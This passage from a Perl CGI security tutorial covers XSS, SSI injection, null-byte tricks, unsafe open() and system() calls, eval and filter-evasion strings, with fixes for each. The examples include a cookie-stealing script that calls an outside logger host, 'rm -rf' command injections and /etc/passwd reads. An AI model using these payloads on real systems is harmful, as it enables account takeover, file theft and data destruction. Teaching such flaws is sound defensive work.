Don't forget that there are more client side scripting languages than just javascript.  Many clients support others, and many scripts don't filter for anything but javascript (there is also activex, java, flash, actionscript, and others).
	
<img src="vbscript:code here">
<img src="mocha:code here">

If that isn't enough to worry about, you also should be converting all character encodings to UTF-8 before doing any filtering for XSS.  Although most clients which visit your site might use one type of character encoding, you cannot be sure of this.  And after all that, I am sure there are plenty more ways to evade XSS filtering.  Trying to stop XSS in scripts is extremely complicated.  It is hard to be sure you did not forget or miss something unless you only allow safe characters or filter all < and > besides the ones you are sure are safe.  You could also trust other people's code by using modules that filter for XSS, check out http://www.perl.com/pub/a/2002/02/20/css.html for more on this.

Cross site scripting may be a hard thing to stop in scripts that print user input to the client, but here are a few things you can do to help minimize the likelihood of serious problems:

Don't put any sensitive info in cookies.  This is way too easy for attackers to get using XSS.  Putting usernames and passwords in a cookie is never a good form of security and should be avoided at all costs.  Even if the cookie is encrypted.  Many times the script automatically logs users in based on their cookie, but the cookie is encrypted for security.  This makes no sense, as once someone has the contents of the cookie the security is completely broken.

Here are a few practical examples of how XSS can be dangerous.  The most common type of attack is a cookie stealing attack which takes your cookie and submits it to a CGI script.
	<script>document.location.replace('http://b0iler.com/logger.cgi?' + document.cookie);</script>

If this is printed to the client's browser it will send them to that logger.cgi with the QUERY_STRING being their cookie for that domain.  This logger.cgi would be a simple script that logs whatever is inputted into a logfile.  Another common thing to do is attack people while they are logged in.  Scripts such as web based email or a content management system like phpnuke allow you to change your options, such as your password.  To change your password the javascript just needs to submit data to a script while you are logged in.  This is very easy to do and can take over an account instantly.  Leaving the victim out in the cold, usually dumbfounded as to what just happened.

There are almost unlimited ways javascript can be used to make an attack.  For more ways look at the thread in bugtraq started on Mar 16 2002 by zeroboy@arrakis.es

http://online.securityfocus.com/archive/82/262341

The following are the replies which actually state something true or useful.  Most posts in this thread were confusing XSS with remote file writing, also some things people said were just wrong.  But there are some good ones.

http://online.securityfocus.com/archive/82/262346
http://online.securityfocus.com/archive/82/262512
http://online.securityfocus.com/archive/82/262957
http://online.securityfocus.com/archive/82/263218
http://online.securityfocus.com/archive/82/263406

I might get a lot of flak for this, but I feel that XSS is currently overhyped.  People are sending advisories to bugtraq saying that sites and scripts are vulnerable to XSS when there is no real security concern.  I feel that XSS is only a valid security problem if it can be used to gain access to something protected.  Instead of blaming XSS for the problems, I would blame doing things which allow XSS to be abused.  Things such as storing usernames and passwords in cookies, allowing logged in users to access or change things without resubmitting a password, or having the session id somewhere accessible to client side scripting.  Now I am not saying XSS isn't a security problem, but it requires another variable to be abused.  In many instances XSS is not a security concern at all, and other times when it is a problem the script should fix the other variables which XSS can abuse.  Many XSS attacks require a lot of social engineering to work, so exploitation is not trivial.  This is not a reason to say XSS isn't a problem, but it helps people realize that it isn't as big a threat as some people believe.  XSS is just too common a problem and too hard to stop, instead I suggest focusing on keeping things secure even if XSS is possible.  XSS is a security problem, and it is being abused every day...  but currently people are going a little nuts about it.  What I am trying to say is: don't just blame XSS as the only problem when you store usernames and passwords in the user's cookie, in this case the overall script design is poor.



SSI
          SSI stands for Server Side Includes, it is meant to be a very basic way to make your pages a little more dynamic and easier to maintain.  You can include files to be printed to the client, execute commands, and even do a limited amount of scripting with it.  Since SSI is run server side it really isn't a cross site scripting problem at all, it is a basic file writing problem.  I am including it in this paper just to inform people who depend on SSI and any kind of scripting that they could be easily attacked with just a file writing exploit or bad permissions.  If SSI is enabled on a webserver and a script prints user input to a page that is parsed for SSI, then there is a chance attackers can include files and execute commands when they view that page.  The syntax for an SSI include is:
	<!--#include file="/etc/passwd" -->

This would make the contents of the /etc/passwd file print on that page just like it was hard coded there.  (Apache is stricter: its file= attribute refuses absolute paths and ../, so there an include is limited to files under the page's own directory.)  The sure way to tell that SSI can be used on a page is the extension .shtml, but you never can tell for sure that .htm or .html files don't parse SSI.  It all depends on the webserver's setup.  Any 'secure' site running SSI will have the command execution feature turned off, so things like this won't work:
	<!--#exec cmd="rm -rf /home/you/www" -->

Many scripts filter for this by using the following regex (it's pretty much the standard for filtering SSI):
	@pairs = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ s/<!--(.|\n)*-->//g;
$FORM{$name} = $value;
}

Now that $value =~ s/<!--(.|\n)*-->//g; is what is filtering SSI.  For the most part it works very well.  No encoding can be done to get around this since it is interpreted server side, and even line breaks won't work with SSI.  But what if the user inputs two values which are both printed to the shtml page one after another?  I have seen a few guestbooks and message boards that print things like "<br> $username $email <br><br> $message <br>".  There you could input username as <!-- and email as #exec cmd="ls" --> which would execute the command ls.  Filtering is a very important part of Perl security, always try to imagine how you could get past the filtering and still do what you want...  sometimes very strange things will work perfectly and get past the filters.  Let's see that SSI filter again, it is supposed to stop <!-- #anything -->
	$value =~ s/<!--(.|\n)*-->//g;

Now let's think about how we got around s/..\///g; by making the filter change the string into a bad string (making .../...// into ../).  Let's try the same thing here by submitting
	<!-<!-- #nothing -->- #include file="/etc/passwd" -->

Nope, this does not work, why?  Because the * in the regex is greedy: perl finds the first <!-- and then matches as much as it can, only backtracking from the end of the string until it finds a -->.  So it matches from the first <!-- to the last -->.  Making the string into just: <!-

Let's step back for a second, is there any possible way of getting around this?  <!-<!-- -->- #include file="/etc/passwd" -<!-- -->-> won't work either, since perl will again find the first <!-- and the last --> and remove everything in between.
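To watch the greedy match in action, here is a small test harness.  It is only a sketch: strip_ssi is a name I made up to wrap the standard filter, and the inputs are the strings from the text.

```perl
use strict;
use warnings;

# The standard SSI filter from the text, wrapped in a sub for testing.
sub strip_ssi {
    my ($value) = @_;
    $value =~ s/<!--(.|\n)*-->//g;
    return $value;
}

# Nested attempt: the greedy match eats everything up to the last -->
my $nested = strip_ssi('<!-<!-- #nothing -->- #include file="/etc/passwd" -->');
print "nested attempt leaves: $nested\n";

# Two fields filtered one at a time, then printed side by side.
my $username = strip_ssi('<!--');
my $email    = strip_ssi('#exec cmd="ls" -->');
print "joined fields: $username $email\n";
```

Neither half of the two field input matches the regex on its own, so both pass through untouched and only become a complete directive once the script prints them next to each other.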

I brainstormed for about 30 seconds for possible ways to get around this filter.  I didn't really see any besides the one I talked about earlier with using two variables side by side ($ssivar1 $ssivar2).  So I hopped on to a shell with ssi and did about 3 tests.  The first one was to see if SSI worked correctly.  The second was so silly I don't wish to mention it.  And the third and final test was:
	<html>
<body>

<did it....
<!-- #include file="testfile.txt" - -> </body> </html>

Which worked.  As you can see I just added a space in between the two dashes in -->.  So now we can easily get around the SSI filter and still execute SSI on pages which are parsed for SSI.  Even sites that only have .html files can still be using SSI.  Many sites just do an 'AddHandler server-parsed .html' and keep the .html extension.  Some even do this just so attackers do not know all their pages are full of SSI.  If anyone runs into a system where the space between the two dashes does not work, give me an email, I only tested it on one box.  I have a few other ideas on how to evade this filter and still get SSI parsed, but I stopped when the space trick worked.
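The filter side of the space trick is easy to check.  The sketch below runs the standard filter over the "- ->" input, then tries one possible stricter alternative that simply never lets a raw < reach the page.  encode_lt is a hypothetical helper of mine, and whether a given server parses the "- ->" form is something only a test on that server can tell you.

```perl
use strict;
use warnings;

# The standard SSI filter from the text.
sub strip_ssi {
    my ($value) = @_;
    $value =~ s/<!--(.|\n)*-->//g;
    return $value;
}

# Hypothetical stricter alternative: never let a raw < reach the page,
# so no SSI directive (or HTML tag) can start at all.
sub encode_lt {
    my ($value) = @_;
    $value =~ s/</&lt;/g;
    return $value;
}

my $attack = '<!-- #include file="testfile.txt" - ->';
print "after strip_ssi: ", strip_ssi($attack), "\n";   # passes through unchanged
print "after encode_lt: ", encode_lt($attack), "\n";
```

The trade off is that encode_lt also kills any html the user was supposed to be allowed to post.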



NULL Byte
          Ok, enough kids' stuff.  Let's start to get serious with perl and exploitation.  This null byte problem is incredibly serious and very inventive.  Whoever found this bug deserves massive respect.  The problem is that \0 (or 00 in hex) is the NULL Byte, and perl treats the NULL Byte as just another character in a string, but C does not.  System calls such as open() and exec() are passed to the operating system.  Unix is coded in C..  and the NULL Byte in C is a string terminator.  Meaning that the string stops when there is a NULL Byte.  This probably doesn't make much sense right now, but as always the example will help you understand (it's sad..  I code better than I speak)
	#get input and put it into $file
$file = $ENV{'QUERY_STRING'};
#convert url encoding to ASCII (%00 will become the NULL Byte)
$file =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$filename = '/home/user/' . $file . '.txt';
open(FILE, "<$filename");

Now what does this script do?  It takes $file and puts /home/user/ in front of it and .txt at the end.  This is used to "make sure" the file opened is a .txt file.  But when you send something like script.cgi%00 to it then perl will send /home/user/script.cgi\0.txt to C which will see it as /home/user/script.cgi since it stops at the NULL Byte.  So it will open /home/user/script.cgi instead of a .txt file.  This means you can do things like ../../../../etc/passwd\0.

Many scripts do not filter the NULL Byte and they depend on adding file extensions to stop you from reading any file on the system.  The fix is as simple as $file =~ s/\0//g; after you convert url encoding to ASCII, please notice this.  A few scripts I've seen filter the null byte before they convert url encoding to ASCII.  This is pretty much pointless.
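The order of those two steps is the whole point, so here is a quick sketch that does it both ways.  The sub names (url_decode, clean_right, clean_wrong) are just labels I picked for the illustration.

```perl
use strict;
use warnings;

# Convert %XX url encoding to raw bytes (same regex as the example above).
sub url_decode {
    my ($s) = @_;
    $s =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    return $s;
}

# Right order: decode first, then strip null bytes.
sub clean_right {
    my ($raw) = @_;
    my $value = url_decode($raw);
    $value =~ s/\0//g;
    return $value;
}

# Wrong order: strip first (nothing to strip yet), then decode.
sub clean_wrong {
    my ($raw) = @_;
    (my $value = $raw) =~ s/\0//g;
    return url_decode($value);
}

printf "right order length: %d\n", length(clean_right('script.cgi%00'));
printf "wrong order length: %d\n", length(clean_wrong('script.cgi%00'));
```

The wrong order comes out one byte longer, and that extra byte is the null that chops off the .txt.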

Another place that is commonly vulnerable to this is when a script allows uploads and checks to make sure the uploaded file has a certain file extension.



Problems With open()
          If you didn't already know that open(FILE, "touch file.txt|"); will run the system command "touch file.txt" then now you do.  And this is a major problem in countless perl scripts.  Out of all these security flaws in perl code, this is the one I would like perl coders to focus on.  It is overlooked by many perl programmers and can easily be spotted and exploited by attackers.  I'd say it and reverse directory transversal are the most exploited perl coding mistakes there are for CGI.  Now let's get right to the examples, shall we?
	use CGI;
$input=CGI->new();
$file = $input->param('file');
open(FILE, $file) or &diehtml("cannot open that file");

Besides reverse directory transversal you can now see how this lack of input filtering can be deadly.  If you go to http://b0iler.eyeonsecurity.net/script.cgi?file=rm -rf ./| the current directory will be deleted!  Not only is the pipe able to make open(FILE, $file) execute commands but also open(FILE, "$file").  Of course open(FILE, '$file') will not work since single quotes do not interpolate variables.  Also when you specify what mode of I/O you are using when opening a file you cannot execute commands.  Examples of vulnerable calls:
	open(FILE, $file);                #$file = command|
open(FILE, "$file"); #$file = command|
open(FILE, "/home/user" . $file); #$file = /../../bin/command|
open(FILE, $file . ".txt"); #$file = |command\0 the null byte is needed to chop off that .txt
open(FILE, "$file.txt"); #$file = |command\0

The last two make use of the null byte.  Lets see another example of vulnerable code that uses the null byte.
	if(-e $file){
open(FILE, "$file");
}

Now this gets tricky.  The -e means exists, so the if is checking whether the file exists or not.  If it does exist it tries to open it.  But the file |command doesn't exist.  How about /bin/command?  That exists, now to get perl to open() it so that it will execute it instead of reading it.  One nice thing is that when perl checks if a file exists it calls on the operating system again, and since the operating system (*nix I hope) is coded in C the null byte works here.  Also when perl checks whether it should execute it or not it only checks the first character and the last character in the filename (open HANDLE FILENAME).  So we can set $file to something like /bin/command\0| and it will execute.  Perl will see the | at the end and execute the command, and the -e check will return true since C will check for /bin/command, stopping at the null byte.  But this is very limiting to the commands you are able to use since you cannot put any spaces or other characters in it.

I don't really see any serious problems with this, but to be safe just filter any dangerous meta characters and specify how you are opening files with < > or >>.  The only problem I see is a DoS - using up tons of resources by running a lot of programs.  There might be a program which could cause security concerns that doesn't require any arguments..  but I am unaware of any installed by default.

The safest way to open a file for reading would be to use sysopen or the 3 argument version of open.  These force you to specify what kind of mode these files are being opened in.  Here is an example of sysopen:
	use Fcntl;              #imports the MODE constants - in this case O_RDONLY
sysopen(FILE, '/home/user/file', O_RDONLY);

sysopen is a more low level version of open, which doesn't have any fancy features such as '-' for STDIN/STDOUT, newline tricks, pipes to execute commands, or anything else..  it's just plain old open to read or write.  Here is an example of open with 3 arguments.  As mentioned before, when you give the mode (< > or >>) no commands can be executed by using pipes.
	open(FILE, "<", '/home/user/file');
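To see that the 3 argument form really treats a pipe as part of the name, here is a small sketch.  read_file is a hypothetical helper, and the example assumes there is no file literally called "echo pwned|" in the current directory.

```perl
use strict;
use warnings;

# Hypothetical helper: open a user-supplied name for reading only.
# With the mode given as its own argument, a trailing | is just part
# of the filename, so nothing gets executed.
sub read_file {
    my ($name) = @_;
    open(my $fh, '<', $name) or return;
    my @lines = <$fh>;
    close($fh);
    return join('', @lines);
}

my $result = read_file('echo pwned|');
print defined $result ? "opened a file\n" : "refused: no such file\n";
```

With a 2 argument open the same string would have run echo.  This does nothing about reverse directory transversal, the name still has to be filtered for that.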

The last open() problem I will go over is one I have only seen once, but I am sure exists in a few other scripts out there.  Using >& as the mode will make the input/output the same as a previous filehandle.  This is a pretty limited attack, but sometimes can be useful if the script filters for any other reverse directory transversal methods.  Take this example:
	#pretend there is good filtering for $FORM{'user'}
#stopping any reverse directory transversal or command execution.
#the database is built like:
#user1:password
#user2:password
#user3:password

open(PWDFILE, '/home/user/not_www_readable/passwd');

#put each line into $value, and go through each line.
while(chomp($value = <PWDFILE>)){
#split the line up into username and password variables
($username,$password) = split(/:/, $value);

#check if the username and password match.
if($FORM{'user'} eq $username && $FORM{'password'} eq $password){
$access = 1;
allowaccess();
}
}
#if the user failed to login then $access would not be set
if(!$access){
#append to the userfile.. if the userfile does not exist then create it.
open(USERLOG, ">>$FORM{'user'}") or open(USERLOG, ">$FORM{'user'}");
print USERLOG "$FORM{'user'} had an invalid login attempt\n";
close(USERLOG);
}
close(PWDFILE);

This is kind of a poor example, since the close(PWDFILE); should be before the if(!$access) in a "proper" script, but many times open is called again while another filehandle is still open from a previous call.  This is what I was trying to emulate as it was similar to the script which I found this vuln in.

The problem here is if someone logs in with the username of '&PWDFILE' they will fail logging in and the script will attempt to log their failure by opening a logfile for that username.  The file &PWDFILE does not exist so it cannot append to it with:
	open(USERLOG, ">>$FORM{'user'}")

but the following is valid
	open(USERLOG, ">&PWDFILE");

Which will cause the script to overwrite /home/user/not_www_readable/passwd with "&PWDFILE had an invalid login attempt\n".  Now the attacker just logs in with: username = '&PWDFILE' and password = '' and they get access.  The person who coded this script thought they stopped all reverse directory transversal attacks, but since they did not know all of perl's features for open they left a door open for attackers.  There is another special convenience feature, which is &=.  It makes that filehandle an alias for another one, this would allow reading files, while >& allows writing.  Keep your eye open for these sorts of vulns, if anyone finds another one I'd love to hear about it.  Note, the same applies for '>file' when you use a bare open(FILE, "$file").  The default mode is read-only, but if $file is '>file' then it will create/overwrite 'file'.  So now we know that open()'s without a mode for i/o are vuln, and open()'s even with a mode for i/o can be vuln...  only in perl folks.
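One way the logging part could be written so a username can never turn into a mode or a filehandle is sketched below.  Everything in it is an assumption for illustration: the helper names, the 32 character cap, and the /home/user/logs/ directory are mine, not from the script I found the vuln in.

```perl
use strict;
use warnings;

# Hypothetical helper: build a log path from a username, or return
# nothing if the name has anything odd in it (like & > < | or /).
sub log_path_for {
    my ($user) = @_;
    return unless defined $user && $user =~ /\A[A-Za-z0-9_]{1,32}\z/;
    return "/home/user/logs/$user.log";   # directory is an assumption
}

# Hypothetical helper: append one line, with the mode spelled out as
# its own argument so the name cannot change it.
sub log_failure {
    my ($user) = @_;
    my $path = log_path_for($user) or return 0;
    open(my $log, '>>', $path) or return 0;
    print {$log} "$user had an invalid login attempt\n";
    close($log);
    return 1;
}

print log_failure('&PWDFILE') ? "logged\n" : "refused to log\n";
```

The allow list does most of the work here, and the separate '>>' argument is a second layer in case the check is ever loosened.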

Bad open() calls are probably the easiest to find for auditors, and easiest to make for programmers.  Try to make it a habit of using secure open() calls even when the file isn't based on user input.  There are a few other problems involving open I'll get to later in the paper.



Perl Length Limits
          I might as well mention this here just because I haven't seen it in any other papers.  I have only seen this problem a few times but things like this do exist and 99% of the perl coders out there never even think about it.  This is when perl limits filename sizes, variable sizes, and other such things which can affect how things in a script work.  With this example you can affect how things such as the -e check, open, unlink, and other file handling functions operate.

The problem is simple.  Take this code as an example, which although long should be simple enough for newbies to understand:
	#check for bad characters
if($FORM{'user'} =~ m/\0|\r|\n/){ die "illegal characters"; }

#check for .htaccess file in /home/user/accounts/$FORM{'user'}
$htaccess = "/home/user/accounts/$FORM{'user'}/.htaccess";

if(-e $htaccess){
#read .htaccess
open(HTACCESS, "<", $htaccess) or die "could not open .htaccess file";
@lines = <HTACCESS>;
close(HTACCESS);

#get username and password
($correctuser,$correctpassword) = split(/:/,$lines[0]);

#check if they are right, give access
if($FORM{'user'} eq $correctuser && $FORM{'pass'} eq $correctpassword){
print "access granted";
access();
}
else{ print "access denied"; }
}
#if the .htaccess does not exist then create a new account.
else{
#makes the directory
#error unless the directory already exists
#if it exists than the script thinks it is just missing a .htaccess
mkdir($FORM{'user'},0755) or die "error accessing user directory" unless (-d $FORM{user});

#create .htaccess file and print username:password
#this should be encrypted but it is just an example.
$useraccess = $FORM{'user'} . "/.htaccess";
open(USERACCESS, ">", $useraccess) or die "could not create user file";
print USERACCESS "$FORM{'user'}:$FORM{'pass'}";
close(USERACCESS);
}

So what does this code do?  It will check if /home/user/accounts/$FORM{'user'}/.htaccess exists, if it does it will check the submitted username and password against the real one.  If it doesn't exist then it will create a new user directory and a .htaccess in it with the submitted username and password.  This looks secure from all the previous types of attacks, but because perl limits filename sizes to around 2050 bytes (at least that is what it is on my box) it can be exploited.

So let's say someone has the account with the username of admin.  Their home directory would be /home/user/accounts/admin/ and their username:password would be in /home/user/accounts/admin/.htaccess.  Usually this would protect people from accessing this directory.  But if an attacker submits ././././././././././././[another 2000 bytes of this]./././admin as $FORM{'user'} there is trouble.  The attacker will need to make ././././[etc]./././admin/.htaccess a valid length so that the .htaccess file is created when the script does open(USERACCESS, ">", $useraccess), but long enough that the if(-e $htaccess) check fails when another 20 bytes are added from the '/home/user/accounts/'.

There are other possible ways to exploit scripts based on how perl sets size limits, this is a very tricky thing to find and it is even harder to remind yourself of these limits while coding.  The best strategy is to limit sizes of all input to a reasonable length (a few hundred characters) and be very aggressive when checking if files/values exist.  I would also suggest using sysopen instead of open, take this for example:
	sysopen(FILE, $file, O_WRONLY | O_CREAT | O_EXCL);

No need to worry about perl's length restrictions, as sysopen with O_EXCL will not open (and so will not overwrite) a file that already exists.  It also helps with those silly race conditions that old perl versions have..  not really a CGI problem though.  You can easily check what your perl limits filenames to by doing something like this:
	linux:~ # perl -e 'while(1){$n++;unless(-e "./" x $n){ die "perl sets limit at " . (--$n);}}'

This will tell you the limit on the number of characters perl allows before it cannot open, unlink, check for existence, or do any other similar file handling.  I'd be interested in hearing if anyone's is way off from 2050 (b0iler@hotmail.com) or if this is a constant value.  Also let me know if anyone else can think of a way to abuse other perl limits.  I have found a few..  but they seem too high to exploit or there is no situation where they would cause a problem.
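The "limit sizes of all input" advice from above could look something like this.  It is a sketch with assumptions: input_ok is a made up name, and the cap of 200 is just my pick for "a few hundred characters".

```perl
use strict;
use warnings;

# Assumed cap; the text only says "a few hundred characters".
my $MAX_INPUT_LENGTH = 200;

# Hypothetical helper: true only for defined, short input with no
# null bytes or line breaks.
sub input_ok {
    my ($value) = @_;
    return 0 unless defined $value;
    return 0 if length($value) > $MAX_INPUT_LENGTH;
    return 0 if $value =~ /[\0\r\n]/;
    return 1;
}

print input_ok('admin') ? "ok\n" : "rejected\n";
print input_ok(('./' x 1000) . 'admin') ? "ok\n" : "rejected\n";
```

Run this check on every form value before it gets anywhere near -e, open, or mkdir, so the padded username never reaches them.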



System Commands
          These are a big time threat if they take in arguments which are based on user input and are not filtered correctly.  Perl is used by many as a way of calling upon different programs and then tying the output together.  This can be very dangerous if the same idea is used when coding CGI scripts.  The security problem here is that you could be giving the attacker a clear shot at executing commands.  The two basic functions for executing system commands in perl are exec() and system().  They both work as if you were at the command prompt.  You first type the program to run, followed by the arguments to this command.  You can also use pipes and redirect i/o with both of these.  So let's say you have this in a script:
	system('cat file.txt');

That is fine.  No real security risk there.  But what if you call system() with an argument inputted from a user?
	system("cat $ENV{'QUERY_STRING'}");

Then the user can name any file the script has permission to read.  Might not be a big deal, just filter reverse directory transversal and add a ./ in front of $ENV{'QUERY_STRING'} right?  No.  Something like this is still extremely vulnerable:
	$input = $ENV{'QUERY_STRING'};
$input =~ s/\\//g;
$input =~ s/\.\.//g;
system("cat ./$input");

It may stop reverse directory transversal, but we forgot that the cat command can take multiple arguments.  Something like cat file.txt /etc/passwd would still work and get past our reverse directory transversal filters.  We need really strict filters in place so that the script can only read files from the current directory.  Which of course includes this script's source, remember to filter this as well.  You can use $0 to get the name of the current script.  Even after you have completely stopped reverse directory transversal, nothing stops the attacker from chaining multiple commands through this system() call.  Many scripts will filter the character ";" and think their system calls are safe.  There is also the "|" character to be worried about.  So if you see this filter you know you can evade it with the |.
	$input = $ENV{'QUERY_STRING'};
$input =~ s/\\//g;
$input =~ s/\.\.//g;
$input =~ s/;//g;
system("cat ./$input");

script.cgi?file.txt|cat /etc/passwd would work against the above.  So this would be safe right?
	$input = $ENV{'QUERY_STRING'};
$input =~ s/\\//g;
$input =~ s/\.\.//g; #this is poor filtering, read next section to see why
$input =~ s/;//g;
$input =~ s/\|//g;
$input =~ s/^\///; #stops /full/path/attacks
system("cat $input");

It filters reverse directory transversal and the two command separators we talked about (; and |).  So attackers cannot do any of the following
	script.cgi?/etc/passwd 
script.cgi?../../../../etc/passwd
script.cgi?file.txt;cat /etc/passwd
script.cgi?file.txt|cat /etc/passwd

But still it is not safe.  There are the i/o redirecting characters > >> and < << which need to be filtered or things like this can be done: script.cgi?</etc/passwd  Again bypassing our reverse directory transversal filters and getting the file they want.  You need to be extremely careful when dealing with files, and letting users specify the directory or filename can be very dangerous.  Make sure you filter extremely well, or only allow the good characters.

Now I said system() and exec() work just like a shell, but that isn't exactly true.  Only if there is a shell metacharacter in the call does perl send it to the shell.  Otherwise perl parses the command itself and calls execvp() directly.  If perl sees a shell metacharacter in the data passed to system() then it must run it through the shell so the shell can handle the metacharacters.  Just like with the open() function, perl allows for a safer way to make this call, with multiple arguments.  Take this for example:
	system("cat", "/home/user/$ENV{'QUERY_STRING'}");

Normally with system("cat /home/user/$ENV{'QUERY_STRING'}") the QUERY_STRING could contain a metacharacter and would get sent to the shell for processing.  But with the example above perl sends cat as the command and /home/user/$ENV{'QUERY_STRING'} as the argument.  This stops attacks like: file;rm -rf /home/user/ where a metacharacter is used to issue multiple commands or do something the script is not meant to do.  Now that we got reverse directory transversal and metacharacters taken care of system() calls are safe, right?  Not quite.  Anything you do in perl you must completely understand.  Take how open() can make filehandles aliases for others with &=: most people do not know this and therefore they do not protect against it being exploited.  The same applies for calling programs from within your scripts, if you don't know a feature of it..  you cannot filter against it being exploited.  One such feature is found in the unix mail program, which allows users to execute commands via the shell with ~!.  So filtering this is very important, and if you blindly call upon programs then their features may be exploited.  Make sure to research any programs you are calling and know all of their features before sending user input to them.

The use of open(HANDLE, "command|"); as stated before can also be used to issue commands.  There is a bad side to using this method as the commands get sent to the shell.  So to avoid this we make open() not call the shell with '-|' and '|-'.  The first one, -|, is for reading the output of the command, and the second one, |-, is used to send data to a command.  The - means STDIN or STDOUT, with the | it executes a command.  Here is an example:
	open(READ, "-|", "cat", "/home/user/$FORM{'file'}");
@lines = <READ>;

This would execute the cat command with the argument of /home/user/$FORM{'file'}.  Maybe I should also tell you that you cannot both read from and write to a command, so things like |command| are illegal.  This is the method I prefer for opening a command for writing:
	open(WRITE, "|-") || exec("/bin/command", "$FORM{'file'}");
print WRITE 'this is piped to /bin/command, which handles the data.';

This will allow you to print to the program without having to open a shell.
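Here is a small sketch that shows the list form keeping shell metacharacters harmless.  run_and_read is a hypothetical helper, and it assumes a unix box with an echo program on the PATH.

```perl
use strict;
use warnings;

# Hypothetical helper: run a program with a list of arguments and
# return what it prints. The list form of open never starts a shell.
sub run_and_read {
    my ($program, @args) = @_;
    open(my $pipe, '-|', $program, @args) or return;
    my @lines = <$pipe>;
    close($pipe);
    return join('', @lines);
}

# The ; and | below reach echo as plain text instead of being run.
print run_and_read('echo', 'file.txt; cat /etc/passwd | sort');
```

Since no shell ever sees the argument, the ; and | mean nothing special.  The program itself still gets the whole string though, so whatever features it has (like the ~! in mail) are still in play.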

Another common way to execute commands in perl is the use of backticks: `command`.  Just like in the shell, the backticks mean execute this command and return the results.  This may look like a single quote, but it isn't.  The backtick is located to the left of the 1 key on every keyboard I've seen.  This will execute the command and return the output to be put in a variable (or anything else you want to do with it).  There is also the qx// which works the same as the backticks.  Here is an example:
	$file = `cat /home/user/$FORM{'file'}`;
print "the contents of $FORM{'file'} is:\n\n $file";

The qx// version would be $file = qx(cat /home/user/$FORM{'file'}); #using () just so I don't have to escape the /'s.  Not much to say about the backticks besides that they do not return any errors, just whatever the program prints to STDOUT.  If the program prints an error message to STDOUT, then that is what gets returned.



Evaluating User Input
          I am very sorry, but I will not be covering how to handle insecure perl from user input.  This topic is pretty lengthy and does not apply to many people, so if you would like to learn about that try the security section of "Programming Perl".  Sorry if this section is short, I just kind of threw it on at the end.

eval() is a function which will interpret anything passed to it as perl.  This can be very dangerous since perl can give attackers so much power over a machine.  If a script took pure user input and sent it to eval() the attacker could easily exploit it.  Here is an example of how eval() works:
	$code = 'print "hello world\n";';
eval($code);

This would make the string 'print "hello world\n";' get parsed by perl, printing "hello world\n".  Since anything can be sent to eval(), things like system(), exec() and other system command functions can be used to turn a poor eval() call into a virtual shell for the attackers.  When handling code that must be eval()'d you need to be extra sensitive to possible security problems.  Treat it as being as dangerous as a system() call, maybe even more dangerous.  The /e regex modifier deserves the same care: it makes perl evaluate the replacement part of a s/// as perl code.  eval() isn't the most commonly used function in CGI, but I've seen it abused many times.  Even with good input filtering it is hard to stop all the possible dangers in perl.  I would suggest using eval() as little as possible, especially with user input.
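Many scripts that eval() user input only really need to let the user pick between a few known operations.  One common alternative (my suggestion, not something from a script covered in this paper) is a dispatch table, sketched here with made up action names:

```perl
use strict;
use warnings;

# Hypothetical dispatch table: the user picks a name, the script picks
# the code. Nothing the user types is ever parsed as perl.
my %actions = (
    add => sub { return $_[0] + $_[1] },
    mul => sub { return $_[0] * $_[1] },
);

sub run_action {
    my ($name, @args) = @_;
    my $code = $actions{$name} or return;   # unknown names do nothing
    return $code->(@args);
}

print run_action('add', 2, 3), "\n";
```

Anything that isn't a key in %actions, like a string containing system(), just gets ignored.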

Lesser used functions which need to be careful not to accept user input are require and do, since both will load a file and run it as perl.  I cannot think of any others which you need to be careful with.  I know more exist, email me if you know of some.



Poor Input Filtering
          This section might seem a bit repetitive since I have been going over problems in filtering and what to filter all along, but filtering user input is such an important part of securing your CGI scripts that I need to cover it more in depth.  You must be completely aware of every possible combination of characters that can be inputted and how they will affect the program.  Many people scripting these CGIs have no clue that .\./ is the same as ../ and that it will elude their filtering.  They figure they are stopping all reverse directory transversal with s/\.\.\///g; This is one of the main problems in CGI scripts: lack of proper filtering.  Some scripts don't filter at all..  they are quickly exploited.  Others filter most of the possible damaging input, but allow one or two key combinations to pass through and exploit the script.  Let's go over good and bad filtering techniques.

The first and most effective way is to deny anything and allow only what is clean.  For example if you want to open a file:
	if($filename !~ m/^[\w\-\.]+\z/){ die "bad characters in filename\n"; }

This will check that the filename contains only 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.' and nothing else (the + makes sure it isn't empty, and \z stops a trailing newline from sneaking past the way $ would allow).  Since these are all ok characters for a filename and represent no security concerns for us we will let them pass.  Anything that is not [a-zA-Z_0-9\-\.] will cause the script to die.  If you were to filter for just the characters which might be used to exploit the script then you are running the risk of forgetting a character, or allowing attackers to bypass the filters, or letting them use the filters to construct a string which will exploit the script.  Let's take an example with multiple filters trying to get rid of all reverse directory transversal and command execution vulns.  The problem depends on the order of your filters: one filter will match and then turn the string into something that should have been caught by a previous filter (or by that same one).  Here is an example of an attempt at good filtering:
	
$filename = '/home/user/' . $ENV{'QUERY_STRING'};

$filename =~ s/\\\///g; #filters \/
$filename =~ s/\\\.//g; #filters \.
$filename =~ s/\.\.\///g; #filters ../
$filename =~ s/\|//g; #filters |

Now this will turn '../../etc/passwd' into a harmless 'etc/passwd' under /home/user/.  It will also get rid of all the \/ and \. tricks if you were to try something like .\./.\./etc/passwd or ..\/..\/etc/passwd.  (Note that none of these four filters touches the null byte, so filename.cgi\0 would need a filter of its own.)  But do you see the problem with how the filters themselves could be used to construct an exploit?  Here's how.
	$ENV{'QUERY_STRING'} = '.|./.|./etc/passwd';

which will not get changed by the first three lines since nowhere does it contain \. \/ or ../, but the last one will affect it because it has |'s in it.  So it starts as .|./.|./etc/passwd, passes the first three filters unchanged and gets turned into ../../etc/passwd by the last filter.

Here is an even more common problem with that filtering technique.  This one does not even need that last s/\|//g; to work, as it relies on the s/\.\.\///g; itself to produce the ../'s.
	$filename = '/home/user/' . $ENV{'QUERY_STRING'};
$filename =~ s/\\\///g; #filters \/
$filename =~ s/\\\.//g; #filters \.
$filename =~ s/\.\.\///g; #filters ../

This one is a little more tricky for people to catch; most perl coders wouldn't think twice about s/\.\.\///g getting rid of all ../s in a variable.  But this input will exploit the filter, making the string dangerous.
	$ENV{'QUERY_STRING'} = '.../...//.../...//etc/passwd';

